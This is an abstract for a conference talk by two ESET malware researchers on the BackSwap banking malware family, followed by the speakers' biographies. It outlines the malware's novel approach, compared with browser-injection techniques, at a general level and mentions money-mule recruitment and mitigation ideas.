BackSwap – The future of banking malware?
Michal Poslusny & Peter Kalnai, ESET
When we discovered a new banking malware family that we later named BackSwap back in April 2018, we were shocked by it’s completely new approach to banking fraud, which is very different from the techniques used by conventional banking malware that have been evolving for over a decade. The conventional methods usually consist of injecting malicious module into the browser followed by hooking specific important functions of the browser in order to read and alter the browsing data. While code injection is still somewhat effective, it has many drawbacks – most importantly the injected payload needs to match the characteristics of the specific targeted browser and therefore forces the malware authors to build multiple versions of such module. In order to be able to install hooks successfully, each of these malicious modules needs to implement a specific branch of code dedicated to each browser it wants to attack. This generally means a lot of work for the malware authors and also frequent maintenance of the banking module, which is especially important when targeting the prevalent Google Chrome browser that has a very specific implementation and the malware authors tend to lose support every time it receives an update.
In our talk we will not only provide detailed analysis of the malware itself, it’s evolution, the innovative techniques and the whole distribution chain, but thanks to our active involvement in the investigation we are also able to provide interesting details about behind the scenes of the operation – for example how the attackers hire innocent people and use them as straw men in order to retrieve the stolen money. Additionally, we will talk about our ideas for potential mitigation of such techniques, as we expect that more and more cyber criminals might eventually shift their attention to methods similar to the ones used by BackSwap.
Michal Poslušný is a malware researcher working at ESET, where he is mainly responsible for reverse engineering of complex malware threats. He also works on developing various internal projects and tools and has actively participated in research presented at AVAR and Virus Bulletin conferences in the past. In his free time he likes to play online games, develop fun projects and spend time with his family.
Peter Kálnai is a malware researcher at ESET. As a speaker, he has represented ESET at various international conferences including Virus Bulletin, AVAR and cyberCentral. He hates mostly malware like crypto-ransomware, because it displays hardly any inventiveness and has a very destructive impact on the victim. His golden rule for cyberspace is always to prioritise security measures over user comfort. In his free time he enjoys table football and travelling.